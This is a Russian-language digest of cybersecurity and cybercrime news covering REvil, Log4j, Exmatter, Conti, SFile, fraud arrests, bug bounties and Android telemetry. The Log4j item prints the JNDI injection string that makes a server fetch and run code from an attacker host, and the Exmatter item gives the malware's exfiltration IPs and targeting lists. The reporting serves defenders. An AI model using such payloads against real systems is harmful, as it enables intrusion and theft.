В марте текущего года ИБ-эксперты обнаружили, что малварь REvil (Sodinokibi) научилась использовать безопасный режим Windows для шифрования файлов. Перезапустив систему с использованием -smode, вредонос избегает обнаружения и повышает свою эффективность. Также специалисты предполагали, что Safe Mode используется для отключения ПО для резервного копирования, серверов баз данных и почтовых серверов.
REvil в безопасном режиме
Однако месяц назад у этой методики был существенный минус: малвари требовалось, чтобы человек вручную вошел в систему в безопасном режиме (до начала шифрования), а это могло вызвать у пользователя закономерные подозрения.
Как теперь сообщает Bleeping Computer, исследователь известный под псевдонимом R3MRUM заметил новую модификацию REvil, которая меняет пароль вошедшего в систему пользователя и настраивает Windows на автоматический вход при перезагрузке.
В новой версии, наряду с использованием –smode, вымогатель меняет пароль пользователя на «DTrump4ever» и вносит изменения в реестр, чтобы Windows автоматически входила в систему, используя новые параметры учетной записи.
Издание отмечает, что уже как минимум два образца REvil, загруженные на VirusTotal за последние два дня, используют в работе именно этот пароль.
Источник: xakep.ru/2021/04/08/dtrump4ever/
В МВД рассказали о противодействии интернет-мошенничеству, передает Polisia.kz.
– Сейчас повсеместно внедрены информационные технологии и онлайн-услуги, все больше информации становится доступной в киберпространстве. Это в значительной мере приводит к уязвимости электронных данных и способствует совершению интернет-мошенничества. Именно они за последние несколько лет стали одними из часто совершаемых видов преступлений, – отметил начальник департамента криминальной полиции МВД Канат Нурмагамбетов.
Мошенники для обмана граждан умело используют весь арсенал технологий и социальную инженерию.
К примеру, 24-летний житель Костаная использовал вредоносные программы для добычи персональных данных – логинов, паролей, IP-адресов интернет- пользователей, которые продавал за криптовалюту через DarkNet и Telegram. Их стоимость варьировалась от 5000 тенге за файл в зависимости от его объема. Установлено, что таким образом преступник заработал более 1,5 млн тенге.
Кроме того, фигурант занимался так называемым “кардингом” – похищение реквизитов банковских карт и их перепродажа, а также за деньги обучал созданию и распространению компьютерных вирусов.
Благодаря своевременно проведенным киберполицией мероприятиям фигурант задержан и осужден.
• Video:
– Продолжает набирать обороты телефонное мошенничество, основанное на социальной инженерии. Доверчивые граждане под влиянием обмана мнимых сотрудников банков и правоохранительных органов лишаются своих накоплений, набирают неподъемные кредиты.
В этой части МВД наращивает взаимодействие с зарубежными коллегами. В апреле в ходе международной спецоперации в украинских городах Одесса и Запорожье ликвидировано пять мошеннических call-центров. Они совершали преступления в отношении казахстанцев. Задержано более 30 участников, проводятся необходимые мероприятия, – добавил Канат Нурмагамбетов.
Аналогичные мошеннические структуры полицией выявлены и в Казахстане.
– Криминальной полицией при проведении оперативных мероприятий в сентябре в городе Алматы ликвидировано четыре call-центра и задержано 47 иностранцев. Они занимались мошенничеством в отношении граждан иностранных государств. У них изъято 1,5 тысячи сотовых телефонов, свыше тысячи sim-карт и более полусотни единиц компьютерной техники. Проводятся следственные мероприятия, изъятая техника изучается, – сказал полковник полиции.
• Video:
Жалость и сострадание граждан использовал 23-летний житель Шымкента. Он создал дубликат аккаунта в Instagram по сбору денег якобы на лечение тяжело больных детей, указав свои банковские счета. При этом родители этих детей об этом даже не знали. Таким образом он собрал от сочувствующих казахстанцев 32 млн тенге.
Он задержан и взят под стражу. В ходе обыска у него изъяты две автомашины с VIP-номерами и крупная сумма денег.
Для обеспечения анонимности мошенники звонят через WhatsApp. Регистрация аккаунтов происходит также скрытно, через sim-боксы.
МВД принимает меры по выявлению таких устройств. Только за месяц работы криминальной полицией выявлено и изъято 20 таких устройств.
Правоохранители разоблачили деятельность злоумышленников, которые обманывали иностранных граждан. Организатора незаконного бизнеса задержали в Днепропетровской области, других членов преступной организации - на Закарпатье. Им грозит до 12-ти лет заключения с конфискацией имущества.
Закарпатские полицейские в сотрудничестве с международными партнерами провели спецоперацию, по результатам которой разоблачили и пресекли деятельность масштабной сети мошеннических колл-центров. Незаконный бизнес наладил 29-летний житель Кривого Рога. Он создал преступную организацию, членами которой стали 18 его сообщников.
Для прекращения их деятельности сотрудники криминальной полиции ГУНП в Закарпатской области провели почти 40 санкционированных судом обысков в нескольких регионах Украины. Речь идет о квартире подозреваемых и колл- центрах, которые фигуранты обустроили в пределах Мукачевского района в арендованных помещениях.
"Во время обысков были изъяты ориентировочно полтысячи единиц техники, оружие, наркотические вещества, банковские карты и деньги - почти 50 тысяч долларов. Также изъято 12 автомобилей, среди которых авто премиумкласса, в частности Mercedes, Ford, Volkswagen, BMW. Все это сейчас является важными вещественными доказательствами по делу, работаем с полученной информацией ", - рассказывает старший следователь полиции Закарпатской области Евгений Бартованец.
В колл-центрах организаторы разместили десятки операторов, которые по указанию лидера звонили иностранцам и представлялись сотрудниками банковских учреждений. В разговоре мошенники отмечали, что должны сообщить своим клиентам тайную информацию. Для этого пострадавших убеждали установить на их гаджеты специальное приложение. После выполнения этой инструкции, злоумышленники получали доступ ко всем банковским счетам иностранных граждан. В дальнейшем - выводили деньги на счета, которые заранее специально создали на подставных лиц.
Членам преступной организации «старший» ставил задачу - 100 тысяч долларов прибыли в неделю. По состоянию на сегодня известно, что дельцы выманили у пострадавших почти миллион долларов. Правоохранителям удалось установить детальный «маршрут» движения средств.
По результатам проведенных оперативных мероприятий под стражей сейчас находится 29-летний лидер преступной организации - его задержание полицейские провели в Днепропетровской области, и его 18 сообщников.
"От имени полиции Венгрии хотел бы поблагодарить за плодотворное сотрудничество следственных подразделений наших государств, которым удалось разоблачить преступную группировку, которая в киберпространстве навредила не только гражданам Венгрии, но и гражданам других стран. Эти преступления мы бы не могли раскрыть, если бы не упорная, преданная работа полицейских из Украины. Мы уверены в том, что это первый шаг к дальнейшему сотрудничеству между нашими службами ", - отмечает спикер полиции Венгрии Кристоф Гал.
Задержанным следователи Главного управления полиции области, под процессуальным руководством прокуратуры, сообщили о подозрении по ч. 4 ст. 28, ч. 1, 2 ст. 255 и ч. 5 ст. 190 Уголовного кодекса Украины, то есть создание преступной организации и участие в ней, с целью совершения мошенничества в особо крупных размерах.
Подозреваемым грозит до 12 лет лишения свободы с конфискацией имущества.
Тульский житель познал цену виртуального вмешательства.
Пролетарский районный суд города Тулы вынес вердикт в отношении местного жителя, который был обвинен в нарушении неприкосновенности частной жизни, использовании вредоносных программ и неправомерном доступе к компьютерной информации.
Мужчина из любопытства установил вредоносное ПО на свой ноутбук и попытался взломать 24 IP-адреса. Путем подбора логина и пароля ему удалось успешно подключиться к трём устройствам.
У первых двух потерпевших хакер сделал скриншоты изображений с камер видеонаблюдения их квартир. С третьей жертвой он пошёл дальше: мужчина взломал веб-камеру ноутбука девушки и сделал запись экрана монитора своего ноутбука, на котором транслировалось изображение с веб-камеры ноутбука потерпевшей. Как отмечается, в запись попали в том числе моменты, когда девушка была полуобнаженной. Мужчина сохранил все материалы на своем ноутбуке.
Обвиняемый полностью признал свою вину. Суд приговорил тульского хакера к штрафу в размере 80 000 рублей по трем статьям уголовного кодекса. Кроме того, ноутбук злоумышленника был конфискован. Приговор уже вступил в законную силу.
Руководящая фигура заработала более $9,5 млн. на интернет-мошенничествах.
Мужчина в США был осужден на 25 лет за серию преступлений с использованием сайтов знакомств и онлайн-мошенничества с целью кражи более $9,5 млн. у компаний и частных лиц.
Прокурор США Райан Бьюкенен заявил , что 46-летний Элвис Эгоса Огиекполор из Норкросса, штат Джорджия, был частью «международной сети онлайн-мошенников и отмывателей денег».
Под руководством Огиекполора в период с октября 2018 года по август 2020 года киберпреступники и денежные мулы открыли более 50 мошеннических банковских счетов в Джорджии на имена 12 подставных фирм . Примечательно, что, если какой-либо из этих счетов был помечен банком как мошеннический, мулы просто открывали новые счета в разных банках.
Затем Огиекполор предоставлял информацию о банковском счете другим сообщникам, чтобы получить доходы от многочисленных мошенничеств с сайтами знакомств, BEC- афер и других преступлений. По данным Министерства юстиции, эти цифровые преступления нанесли ущерб десяткам жертв по всему миру, а также множеству предприятий.
13 жертв так называемого «романтического мошенничества» (romance scam) рассказали о том, что они общались с мужчинами на сайтах знакомств в течение нескольких месяцев, ни разу не встречаясь лично. Мошенники уверяли женщин, что хотят начать новую жизнь с ними, и просили перевести деньги на счет, чтобы помочь решить различные финансовые проблемы. В одном случае женщина перевела на счет мошеннику $32 000. Скриншоты переписок доступны в документе расследования .
Также жертвы BEC-мошенничества рассказали, что они получали поддельные электронные письма с требованием выплаты в размере нескольких тысяч долларов на счет, который контролировался Огиекполором . Только после перевода средств жертвы осознавали, что их обманули.
В феврале 2022 года Огиекполор был осужден по одному пункту обвинения в сговоре с целью отмывания денег и по 15 пунктам обвинения в отмывании денег. 31 мая он был признан виновным по всем пунктам обвинения после 8-мидневного судебного разбирательства. После того, как Огиекполор отбудет свой срок в федеральной колонии, он проведет еще 3 года на свободе под надзором.
source:
justice[.]gov/usao-ndga/pr/georgia-man-who-laundered-millions-romance-scams-
business-email-compromises-and-other
regmedia.co.uk/2022/10/03/ogiekpolor_grand_jury_indictment.pdf
regmedia.co.uk/2022/10/03/fbi_affidavit_ogiekpolor.pdf
В Apache Log4j 2, популярном фреймворке для организации ведения логов в Java- приложениях, выявлена критическая уязвимость, позволяющая выполнить произвольный код при записи в лог специально оформленного значения в формате "{jndi:URL}". Атака может быть проведена на Java-приложения, записывающие в лог значения, полученные из внешних источников, например, при выводе проблемных значений в сообщениях об ошибках.
Отмечается, что проблеме подвержены почти все проекты, использующие такие фреймворки, как Apache Struts, Apache Solr, Apache Druid или Apache Flink, включая Steam, Apple iCloud, клиенты и серверы игры Minecraft. Ожидается, что уязвимость может привести к волне массовых атак на корпоративные приложения, повторив историю критических уязвимостей во фреймворке Apache Struts, который по приблизительной оценке применяется в web-приложениях 65% компаний из списка Fortune 100. В том числе уже зафиксированы попытки сканирования сети на предмет уязвимых систем.
Проблема усугубляется тем, что уже опубликован рабочий эксплоит, но исправления для стабильных веток на данный момент не сформированы. СVE-идентификатор пока не присвоен. Исправление включено только в тестовую ветку log4j-2.15.0-rc1. В качестве обходного пути блокирования уязвимости рекомендуется выставить параметр Log4j2.formatMsgNoLookups в значение true.
Проблема была вызвана тем, что Log4j 2 поддерживает обработку специальных масок "{}" в выводимых в лог строках, в которых могли выполняться запросы JNDI (Java Naming and Directory Interface). Атака сводится к передаче строки с подстановкой "${jndi:ldap://attacker.com/a}", при обработке которой Log4j 2 отправит на сервер attacker.com LDAP-запрос пути к Java-классу. Возвращённый сервером атакующего путь (например, <http://second- stage.attacker.com/Exploit.class>) будет загружен и выполнен в контексте текущего процесса, что позволяет атакующему добиться выполнения произвольного кода в системе с правами текущего приложения.
+ 1: Уязвимости присвоен идентификатор [CVE-2021-44228](https://security- tracker.debian.org/tracker/CVE-2021-44228).
+ 2: [Выявлен способ](https://www.cyberkendra.com/2021/12/worst-log4j-rce- zeroday-dropped-on.html) обхода защиты, добавленной выпуск log4j-2.15.0-rc1. Предложено новое обновление log4j-2.15.0-rc2 с более полной защитой от уязвимости. В коде в[ыделяется](https://github.com/apache/logging- log4j2/commit/c2b07e37995004555c211cdf0bb169d6a6a6f96b) изменение, связанное с отсутствием аварийного завершения в случае использования некорректно оформленного JNDI URL.
Исследователи из Symantec обнаружили, что один из аффилиатов RaaS-сервиса BlackMatter начал использовать в атаках кастомный инструмент кражи документов с целью шантажа. Анализ показал, что Exmatter способен отыскивать в папках жертвы файлы с заданными расширениями и выгружать их на удаленный сервер до запуска шифровальщика.
На памяти экспертов это уже третий случай, когда операторы вымогательских программ создают собственную утилиту для вывода данных. Два года назад такой инструмент появился у ОПГ, стоящей за Ryuk, а минувшим летом — в пакете услуг LockBit (с обновлением шифровальщика до версии 2.0 клиентам криминального сервиса стали предлагать также программу-шпиона StealBit).
Написанный на .NET зловред Exmatter при запуске прежде всего пытается спрятать свое окно через вызов API-функции ShowWindow(). Для идентификации объектов, подлежащих сливу на сторону, программа собирает имена всех логических дисков и путей к файлам.
При поиске файлов вредонос руководствуется списком из 13 расширений, включающим .docx, .xlsx, .pdf, .msg, .png и .csv. Примечательно, что Exmatter не крадет файлы мельче 1024 байт. Он также обходит стороной большое количество папок:
C:\Documents and Settings
C:\PerfLogs
C:\Program Files\Windows Defender Advanced Threat
Protection\Classification\Configuration
C:\Program Files\WindowsApps
C:\ProgramData\Application Data
C:\ProgramData\Desktop
C:\ProgramData\Documents
C:\ProgramData\Microsoft
C:\ProgramData\Packages
C:\ProgramData\Start Menu
C:\ProgramData\Templates
C:\ProgramData\WindowsHolographicDevices
C:\Recovery C:\System Volume Information
C:\Users\All Users
C:\Users\Default
C:\Users\Public\Documents
C:\Windows
Все находки отправляются на SFTP-сервер с IP-адресом 165[.]22[.]84[.]147 (порт 22); предусмотрено также обращение к SOCKS5-прокси на порту 1080, но эта настройка пока не используется. После вывода данных Exmatter заметает следы — пытается с помощью PowerShell перезаписать начальный блок данных в своем файле и удаляет его.
Исследователям попадались разные варианты зловреда. По всей видимости, его создатели все еще совершенствуют свой инструмент, чтобы обеспечить кражу важных данных в достаточном объеме и в кратчайшие сроки.
Так, один из более новых вариантов Exmatter пользовался более длинным списком расширений — в него были добавлены .xlsm и .zip. В следующей версии этот список был расширен до 22 позиций за счет добавления .json, .config, .ts, .cs, .js, .aspx и .pst.
Этот сэмпл также не трогал файлы, имена которых содержали следующие строки:
OneDriveMedTile
locale-
SmallLogo
VisualElements
adobe_sign
Adobe Sign
core_icons
Появился и еще один вариант выгрузки краденого: зловреду был придан клиент WebDav, привязанный к хранилищу на сервере 157[.]230[.]28[.]192. Тем не менее, судя по структуре кода, злоумышленники продолжают отдавать предпочтение протоколу SFTP, а WebDav остался в резерве.
При дальнейшей доработке кода SFTP-сервер зловреда сменил IP-адрес (на 159[.]89[.]128[.]13), но остался в той же AS-сети облачного провайдера DigitalOcean. Белый список расширений тоже был обновлен — из него исчезла позиция .png.
Кто именно создал Exmatter, владельцы BlackMatter или какой-то клиент их сервиса RaaS (Ransomware-as-a-Service, шифровальщик как услуга), установить не удалось. По данным Symantec, за распространение BlackMatter ответственна та же криминальная группа, которая ранее оперировала шифровальщиком Darkside (получил скандальную известность после атаки на Colonial Pipeline).
• Source: [https://symantec-enterprise-blogs.s...at-intelligence/blackmatter- data-exfiltration](https://symantec-enterprise- blogs.security.com/blogs/threat-intelligence/blackmatter-data-exfiltration)
Кардеры создавали фейк видео и аудио, на которых знаменитости или гос деятели якобы рекомендовали быстрые способы заработка или инвестиционные схемы. Кардхолдеры, доверяя “авторитетным” лицам, переходили по ссылкам, где вводили свои персональные и финансовые данные.
Украденные деньги переводились на банковские карты кардеров, после чего конвертировались в криптовалюту для дальнейшего сокрытия. В ходе операции у задержанных было изъято множество банковских карт, которые теперь выступают вещественными доказательствами.
Действия задержанных киберпреступников были квалифицированы по следующим статьям Уголовного кодекса:
Статья 168: мошенничество с использованием информационных технологий.
Наказание составляет от 5 до 8 лет лишения свободы.
Статья 243: легализация доходов, полученных преступным путём. Наказание — от 5
до 10 лет лишения свободы.
Статья 278-8: нарушение законодательства в сфере оборота криптоактивов.
Наказание — от 3 до 5 лет лишения свободы.
Экономическая полиция Петербурга задержала группу "теневых" банкиров, трое из которых были членами одной семьи. Во время визита правоохранителей предполагаемые обнальщики пытались избавиться от крупных сумм наличности, выкидывая их в окно.
Детали операции сообщили в пресс-службе ГУ МВД по Санкт-Петербургу и Ленинградской области. По данным полиции, группой руководил 53-летний житель Приморского района. Ему помогали две сестры 47 и 38 лет, которые занимались бухгалтерией и вели финансовую документацию. Функции курьера взял на себя 44-летний брат женщин. Ему доверяли обналичивание денег через банкоматы различных банков.
Нелегальной банковской деятельностью участники группы занималась с июня 2019 года. Они принимали на счета подконтрольных фирм деньги по безналу от юридических лиц и индивидуальных предпринимателей. Для этого была зарегистрирована целая сеть из 70 фиктивных организаций.
Под видом мнимых сделок проводились операции по обналичиванию и возвращению средств клиентам за вычетом "вознаграждения". За свои услуги "прачечная" брала не менее 16,5% от обналиченной суммы. За 3,5 года известный полиции доход нелегальных банкиров составил не менее 44,7 млн рублей.
В ходе обысков были изъяты банковские карты и печати, мобильные телефоны и компьютерная техника для доступа в систему "банк-клиент", электронные носители информации с данными о деятельности подконтрольных организаций, наличные в размере более 3 млн рублей, 37 тыс. евро и более $53 тыс.
При задержании организатор "теневого" бизнеса пытался выкинуть часть документов и денег с балкона многоэтажки. Его примеру последовала и одна из бухгалтеров после звонка сотрудников полиции в дверь.
В Петербурге задержали «обнальщиков», заработавших почти 50 миллионов за 3,5 года. Об этом 25 марта сообщает пресс-служба ГУ МВД по Петербургу и Ленобласти.
Предполагаемый организатор схемы — 53-летний житель Приморского района. Дело было семейным. Две сестры, 38 и 47 лет, вели бухгалтерию и занимались финансовой документацией, а их 44-летний брат работал как курьер и через банкоматы превращал цифры со счетов в осязаемые купюры.
source: dp.ru/a/2023/03/25/Na_severe_Peterburge_zade
Recorded Future подчёркивает глобальный рост угрозы легитимных платформ.
Согласно недавнему отчёту издания Recorded Future, платформа для разработчиков GitHub в последнее время превратилась в популярный инструмент для хакеров, которые используют его для размещения и доставки вредоносных программ.
Платформа предоставляет атакующим возможность маскировать свои действия под легитимный сетевой трафик, что затрудняет отслеживание и определение личности злоумышленников.
Эксперты называют эту тактику «Living Off Trusted Sites» (LOTS), что является модификацией техники «Living off the Land» (LotL), часто используемой злоумышленниками для скрытия вредоносной деятельности.
Наиболее распространённым способом злоупотребления GitHub является доставка вредоносных программ. Например, компания ReversingLabs в прошлом месяце сообщала о ряде поддельных Python-пакетов, которые получали вредоносные команды из секретных репозиториев GitHub.
Хотя полноценные реализации систем управления в GitHub встречаются реже, чем другие инфраструктурные схемы, использование платформы в качестве «мёртвого ящика» — для получения URL управляющих серверов — встречается гораздо чаще. Также редко, но всё же фиксируется использование GitHub для выгрузки данных, что, по мнению Recorded Future, связано с ограничениями на размер файлов и опасениями обнаружения.
Помимо этих схем, GitHub часто используется злоумышленниками различными способами, включая применение GitHub Pages в качестве хостов для фишинга или перенаправления трафика, а также как резервный канал управления.
Отчёт Recorded Future подчёркивает общую тенденцию к эксплуатации злоумышленниками легитимных интернет-сервисов, таких как Google Drive, Microsoft OneDrive, Dropbox, Notion, Firebase, Trello, Discord, и различных платформ для управления исходным кодом, включая GitLab, BitBucket, Codeberg.
Recorded Future указывает, что универсального решения для обнаружения злоупотреблений популярными сервисами не существует. Требуется комбинация стратегий обнаружения, которая зависит от конкретной среды, доступности журналов, структуры организации, моделей использования сервиса и уровня риска.
sc: recordedfuture.com/flying-under-the-radar-abusing-gitHub-malicious- infrastructure
На этой неделе Reddit объявил о запуске публичной программы bug bounty на платформе HackerOne.
В последние три года у сайта уже действовала собственная программа вознаграждений за обнаруженные уязвимости, но она была доступна только для избранных исследователей. За это время Reddit получил 300 отчетов об уязвимостях, а выплаты специалистам превысили 140 000 долларов.
Теперь bug bounty будет доступна для всех желающих, и в компании подчеркивают, что цель программы — защитить учетные записи пользователей, их личности и личные данные, включая чаты, сообщения, адреса электронной почты, историю голосований и данные о подписках на сабреддиты. Для этого компания решила расширить рамки программы: теперь в нее входят все поддомены reddit.com и snooguts.net.
Отчеты об уязвимостях должны содержать достаточно информации, чтобы команда Reddit могла воспроизвести баг самостоятельно. Исследователи могут претендовать на вознаграждение в размере до 10 000 долларов США, если уязвимость считается критической. Также специалисты могут получить до 5000 долларов за ошибки высокой степени серьезности, 500 долларов за ошибки средней серьезности и 100 долларов за недостатки низкой серьезности.
Уязвимости считаются критическими, если они приводят к массовой компрометации пользовательских данных, включая хэши паролей, адреса электронной почты, частные чаты и сообщения, а также если они позволяют злоумышленнику обойти аутентификацию и получить доступ к учетным записям.
Исследователям запрещается получать доступ к учетным записям или данным других пользователей, публично разглашать детали выявленных уязвимостей без явного согласия Reddit и до того как персонал Reddit исправит проблемы.
Кроме того, исследователям запрещается сканировать внутреннюю сеть Reddit после получения удаленного доступа к серверу, а также злоупотреблять обнаруженными уязвимостями для загрузки вредоносных программ, дальнейшего ослабления безопасности затронутых систем или оказания влияния на производительность и доступность Reddit.
Источник: xakep.ru/2021/04/16/reddit-bug-bounty/
ОС отправляет конфиденциальные данные, включая постоянные идентификаторы и
телеметрическую информацию.
Группа исследователей в области кибербезопасности из Великобритании
выявила
множественные проблемы с конфиденциальностью, возникающие при использовании
смартфонов под управлением ОС Android.
Эксперты провели анализ устройств Samsung, Xiaomi, Realme и Huawei под
управлением Android или двух форков ОС — LineageOS и /e/OS.
По словам исследователей, даже когда телефон минимально настроен и
простаивает, Android передает значительный объем информации Google, а также
третьим сторонам (Microsoft, LinkedIn, Facebook и пр.), чьи приложения
предустановлены на устройстве. ОС отправляет конфиденциальные пользовательские
данные, включая постоянные идентификаторы, сведения об использовании
приложений и телеметрическую информацию.
Как отметили специалисты, отказаться от сбора данных нельзя, поэтому
пользователи Android-устройств бессильны против такого типа телеметрии.
В случае некоторых встроенных системных приложений, таких как miui.analytics
(Xiaomi), Heytap (Realme) и Hicloud (Huawei), исследователи обнаружили, что
зашифрованные данные иногда могут быть декодированы, таким образом подвергая
пользователей риску MitM-атак.
Даже если пользователь сбрасывает рекламные идентификаторы для своей учетной
записи Google на Android, система сбора данных может повторно связать новый
идентификатор с тем же устройством и добавить его в исходную историю
отслеживания.
Деанонимизация пользователей происходит с использованием различных методов,
таких как просмотр SIM-карты, IMEI, истории данных о местоположении, IP-
адреса, сетевого SSID или их комбинации.
Подробнее:
https://www.securitylab.ru/news/525593.php
На самом деле отключить слив данных можно, единственное не получится использовать VPN. Хотя на рутованном можно с VPN настроить.
В первую очередь удаляете ненужные установленные системные приложения для
вашего пользователя, понадобиться adb, комп и шнур USB. Команды по удалению:
https://dev.to/plotegor/android-adb-561c
Затем ставите NetGuard, блокируете доступ к сети всем, кроме нужных
приложений: https://github.com/M66B/NetGuard/releases
Можно сначала блокировать трафик, включить увдедомления о подключениях, затем удалять конкретные приложения которые без вашего ведома пытаются стучать в сеть. Все приложения которые имеют в названии google тоже нужно будет удалить. Неудаляемые можно отключать, зайдя в Настройки-Приложения.
Атаки с использованием нового варианта SFile были обнаружены в прошлом году.
Операторы вымогательского ПО SFile, также известного как Escal, портировали свою программу Linux. Как на прошлой неделе сообщили специалисты китайской ИБ- компании Rising, атаки с использованием нового варианта SFile были обнаружены в прошлом году. То же самое сообщили их коллеги из MalwareHunterTeam.
Первоначальный вариант вымогательского ПО SFile был предназначен только для Windows (атаки с его использованием впервые были зафиксированы в феврале 2020 года).
За последние два года SFile использовался в целенаправленных атаках на корпоративные и правительственные сети. В ходе атак вымогатель обычно шифрует файлы и оставляет записку с требованием выкупа, в которой говорится, что жертва должна связаться с хакерами по одному из трех электронных адресов и обсудить условия получения ключа для расшифровки файлов.
В соответствии с главной тенденцией в экосистеме вымогательского ПО, когда киберпреступники создают Linux-версии своей полезной нагрузки, Linux-вариант SFile был замечен в конце прошлого года. Новая версия шифрует файлы по той же схеме, что и версия для Windows, но с некоторыми улучшениями.
Согласно специалистам MalwareHunterTeam, наиболее интересным улучшением является возможность шифровать файлы на основе временного диапазона – как способ шифрования последних файлов, которые могут иметь большее значение для некоторых жертв и обычно не включаются в последние резервные копии.
Вымогательское ПО SFile также является одним из редких случаев, когда имя жертвы используется в расширении, добавляемом в конце каждого зашифрованного файла.
Среди последних жертв SFile – несколько китайских компаний. Как предположили специалисты Rising, одной из жертв является технологическая фирма Nuctech, в отношении которой в конце 2020 года правительство США ввели санкции за передачу информации пассажиров авиакомпаний правительству Китая.
Несмотря на появление Linux-версии, количество атак SFile остается небольшим по сравнению с атаками таких известных вымогателей, как Conti, LockBit, Grief и STOP.
Полиция американского города Салем (штат Орегон) сообщила об аресте 33-летнего местного жителя Росса Серзеги, несколько лет промышлявшего кражей почты. По данным местных СМИ, у него дома было обнаружено 13,6 килограмма различных почтовых отправлений. Следователи предполагают, что из них он изымал дебетовые карты, сумев обналичить в итоге около 16 тысяч долларов.
Помимо кражи почты и личных данных, мужчине предъявлены обвинения в банковском мошенничестве, незаконном хранении огнестрельного оружия и короткоствольного ружья, а также бронежилета, подделке документов и краже со взломом. При обысках у него нашли поддельные ключи от почтовых ящиков и инструменты для изготовления чеков, банковские карты и финансовые документы на чужие имена.
Теперь местные власти разбирают найденные у Серзеги килограммы чужой почты. Около 200 человек и организаций наконец-то получили письма, отправленные им несколько лет назад. Почему вор не избавлялся от чужих посылок — неизвестно.
sc: statesmanjournal.com/story/news/crime/2024/03/27/officers- recover-30-pounds-stolen-mail-checks-debit-cards-salem-oregon/73113158007
Операторы Conti отключили остатки общедоступной инфраструктуры — два сервера в сети Tor, которые использовались для публикации данных жертв и ведения переговоров о выкупе. Админ-панель сайта Conti News и хранилище краденой информации закрыли еще месяц назад, и список неплательщиков все это время не пополнялся.
Уход последних серверов Conti в офлайн заметили в среду, 22 июня, участники проекта DarkFeed (мониторинг ransomware). В пятницу, по словам BleepingComputer, они по-прежнему были недоступны.
[](https://www.anti- malware.ru/files/image1conti_brand_rip.jpeg)
Во второй половине мая группировка, стоящая за Conti, начала сворачивать связанные с этим шифровальщиком операции. Серверы, используемые для коммуникаций и хранения данных, были выведены из эксплуатации, служба для ведения переговоров с жертвами отключена, загрузка на сайт информации об успешных атаках прекратилась.
Чтобы скрыть эти работы от аутсайдеров, ОПГ пустила дымовую завесу: поручила одному участнику проявлять активность на сайте. Он продолжал публиковать некие краденые данные (на поверку, результаты прежних атак) и поддразнивать одну из последних жертв — правительство Коста-Рики.
Массированная атака Conti на госструктуры Коста-Рики произошла в апреле. Злоумышленникам удалось украсть 672 Гбайт данных у 27 организаций и остановить работу ряда жизненно важных служб; в итоге в стране было объявлено чрезвычайное положение.
Решение упразднить бренд Conti назрело, прежде всего, из-за повышенного внимания со стороны ИБ-сообщества и правоохранительных органов. Атаки злоумышленников стали слишком дерзкими и громкими, а после утечки внутренних данных ОПГ некоторые твиттеряне начали собирать на преступников досье. Власти США, со своей стороны, объявили награду до $10 млн за головы руководителей преступного синдиката.
Поскольку операторы Conti активно устанавливали партнерские связи и охотно принимали под свое крыло менее удачливых коллег, они теперь могут себе позволить работать под другими брендами, разбившись на мелкие группы и сохраняя связи со своими главарями и специалистами — тестировщиками, разработчиками, программистами.

Исследователи SentinelOne [обнаружили](https://labs.sentinelone.com/hotcobalt- new-cobalt-strike-dos-vulnerability-that-lets-you-halt-operations/) DoS- уязвимость в Cobalt Strike, что позволяет блокировать управление маяками, а также новые развертывания.
Напомню, что этот легитимный коммерческий инструмент, созданный для пентестеров и red team и ориентированный на эксплуатацию и постэксплуатацию, давно любим хакерами, начиная от правительственных APT-группировок и заканчивая операторами шифровальщиков. Хотя он недоступен для рядовых пользователей и полная версия оценивается примерно в 3500 долларов за установку, злоумышленники все равно находят способы его использовать (к примеру, полагаются на старые, пиратские, взломанные и незарегистрированные версии).
Как правило, злоумышленники используют взломанные версии Cobalt Strike для получения устойчивого удаленного доступа к скомпрометированной сети (и постэксплуатации после развертывания так называемых маяков) и нередко применяют его во время вымогательских атак.
Специалисты SentinelOne сообщают, что обнаружили уязвимость CVE-2021-36798 (получившую название Hotcobalt) в последних версиях сервера Cobalt Strike. Баг позволяет зарегистрировать поддельные маяки на сервере конкретной установки Cobalt Strike, а затем, отправляя фальшивые задачи на этот сервер, вывести его из строя, исчерпав доступную память.
В результате уже установленные маяки не смогут взаимодействовать C&C-сервером, установка новых маяков в зараженных системах тоже будет заблокирована, и это помешает red team или злоумышленникам использовать развернутые маяки.
«Активные маяки не смогут связываться со своим C&C-сервером, пока операторы его не перезапустят. Однако перезапуска тоже недостаточно для защиты от этой уязвимости, поскольку можно повторно атаковать сервер, пока он не будет исправлен или пока конфигурация маяков не будет изменена», — пишут эксперты, предполагая, что правоохранительные органы и ИБ-исследователи смогут использовать Hotcobalt для ликвидации инфраструктуры хакеров.
Click to expand...
Уязвимость была обнаружена еще в апреле, и разработчики CobaltStrike HelpSystems устранили баг, выпустив Cobalt Strike 4.4 на этой неделе.
Китайская Tencent Cloud объявила о запуске цифровой платформы для создания
людей — Deepfakes-as-a-Service (DFaaS). Она обещает создавать цифровые копии
людей высокой чёткости, используя всего три минуты живого видео и 100
произнесённых фраз.
Такая услуга стоит $145. Для создания дипфейка потребуется 24 часа.
При этом заказчик сможет кастомизировать задний фон персонажа, а также выбрать предпочтительный тон кожи и другие аспекты.
Сгенерированные дипфейки обладают плоской интонацией и единым речевым ритмом,
характерным для традиционных акустических моделей, за счёт использования
собственной технологии настройки тембра с малыми выборками. Она основана на
акустических моделях глубокого обучения и вокодерах (устройствах синтеза речи
на основе произвольного сигнала) нейронных сетей.
source: jiemian.com/article/9312569.html
Microsoft опубликовала очередную тестовую сборку Windows 11 под номером 22567 на канале Dev, основными нововведениями которой стали возможность привязать банковскую карту для платных сервисов, функция Smart App Control для обнаружения потенциально опасного ПО, возможность подключить Android-смартфон на этапе установки системы, а также запуск обновлений, когда в местной электросети преобладают экологически чистые источники энергии.
Пожалуй, наиболее заметным нововведением в очередной тестовой сборке Windows 11 стал запрос номера банковской карты, который может понадобиться для платных услуг Microsoft. Это пригодится при покупке ПО или другого контента в Microsoft Store либо через Xbox, а также при оформлении подписок. Нововведение объясняется исключительно удобством клиента: если срок действия карты истекает, и это ставит под угрозу оплату очередного периода подписных услуг, пользователь получает об этом уведомление.
В новой тестовой сборке Windows 11 также появилась функция контроля приложений Smart App Control (SAC). Как говорят в Microsoft, она «блокирует ненадёжные или потенциально опасные приложения». Список такого софта зависит от Microsoft и самого пользователя. Для корректной работы SAC необходимо установить Windows 11 с нуля, а дальше она начинает изучать программное окружение, настраиваясь в ознакомительном режиме и стараясь как можно меньше мешать работе. Управление SAC производится в настройках безопасности системы.
